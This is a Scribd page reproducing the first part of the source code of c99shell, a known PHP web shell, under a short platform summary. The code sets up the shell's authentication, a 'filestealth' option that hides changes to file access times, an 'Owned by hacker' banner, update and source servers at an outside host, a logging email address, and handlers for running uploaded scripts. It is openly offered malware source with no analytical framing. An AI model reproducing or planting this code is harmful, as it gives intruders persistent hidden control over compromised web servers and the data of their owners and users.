Scribd
Upload
146 views3 pages

Code Source Du Script Shell C99

This document contains PHP code for configuring a web shell. It defines variables for the shell version, URL, login credentials, file types, and other settings. Functions are defined for stripping slashes, merging request data, and getting the microtime. Directories are set for temporary files, logs, and the starting folder. Settings control features like auto-filling the URL, file sorting, and displaying a message for donated shells.

Uploaded by

Mora SOW
Copyright
© © All Rights Reserved
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
Download as rtf, pdf, or txt
146 views3 pages

Code Source Du Script Shell C99

This document contains PHP code for configuring a web shell. It defines variables for the shell version, URL, login credentials, file types, and other settings. Functions are defined for stripping slashes, merging request data, and getting the microtime. Directories are set for temporary files, logs, and the starting folder. Settings control features like auto-filling the URL, file sorting, and displaying a message for donated shells.

Uploaded by

Mora SOW
Copyright
© © All Rights Reserved
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
Download as rtf, pdf, or txt
Download as rtf, pdf, or txt
You are on page 1/ 3

1 <?

php
2 //Starting calls
3 if (!function_exists("getmicrotime")) {function getmicrotime() {
4 list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)
$sec);}}
5 error_reporting(5);
6 @ignore_user_abort(TRUE);
7 @set_magic_quotes_runtime(0);
8 $win = strtolower(substr(PHP_OS,0,3)) == "win";
9 define("starttime",getmicrotime());
10 if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function
strips(&$arr,$k="")
11 {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) !=
"GLOBALS") {
12 strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}}
strips($GLOBALS);}
13 $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
14 foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
15 $shver = "1.0 pre-release build #16"; //Current version
16 //CONFIGURATION AND SETTINGS
17 if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
18 elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
19 else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
20 }
21 $surl_autofill_include = TRUE; // If TRUE then search variables with
22 // descriptors (URLs) and save it in SURL.
23 if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&";
24 foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",
$v);
25 $name = urldecode($v[0]); $value = urldecode($v[1]);
26 foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {
27 if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".
28 urlencode($value)."&";}}}
29 if ($_REQUEST["surl_autofill_include"]) {
30 $includestr .= "surl_autofill_include=1&";}}
31 if (empty($surl)) {
32 $surl = "?".$includestr; //Self url
33 }
34 $surl = htmlspecialchars($surl);
35 $timelimit = 0; // time limit of execution this script over
36 // server quote (seconds), 0 = unlimited.
37 //Authentication
38 $login = ""; //login
39 //DON'T FORGOT ABOUT PASSWORD!!!
40 $pass = ""; //password
41 $md5_pass = ""; //md5-cryped pass. if null, md5($pass)
42 $host_allow = array("*"); //array ("{mask}1","{mask}2",...),
43 {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
44 $login_txt = "Restricted area"; //http-auth message.
45 $accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">
46 c99shell v.".$shver."</a>: access denied";
47 $gzipencode = TRUE; //Encode with gzip?
48 $updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
49 $c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server
50 $c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server
51 $filestealth = TRUE; //if TRUE, don't change modify- and access-time
52 $donated_html = "<center><b>Owned by hacker</b></center>";
53 /* If you publish free shell and you wish
54 add link to your site or any other information,
55 put here your html. */
56 $donated_act = array(""); // array ("act1","act2,"...),
57 // if $act is in this array, display $donated_html.
58 $curdir = "./"; //start folder
59 //$curdir = getenv("DOCUMENT_ROOT");
60 $tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or
%WINDIR/temp)
61 $tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
62 $log_email = "0xd4yx@gmail.com"; //
63 $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or
"d"escending
64 $sort_save = TRUE; //If TRUE then save sorting-position using cookies.
65 // Registered file-types.
66 // array(
67 // "{action1}"=>array("ext1","ext2","ext3",...),
68 // "{action2}"=>array("ext4","ext5","ext6",...),
69 // ...
70 // )
71 $ftypes = array(
72 "html"=>array("html","htm","shtml"),
73
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
74 "exe"=>array("sh","install","bat","cmd"),
75 "ini"=>array("ini","inf"),
76
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl")
,
77
"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg"
,"mpeg"),
78 "sdb"=>array("sdb"),
79 "phpsess"=>array("sess"),
80 "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
81 );
82 // Registered executable file-types.
83 // array(
84 // string "command{i}"=>array("ext1","ext2","ext3",...),
85 // ...
86 // )
87 // {command}: %f% = filename
88 $exeftypes = array(
89 getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
90 "perl %f%" => array("pl","cgi")
91 );
92 /* Highlighted files.
93 array(
94 i=>array({regexp},{type},{opentag},{closetag},{break})
95 ...

You might also like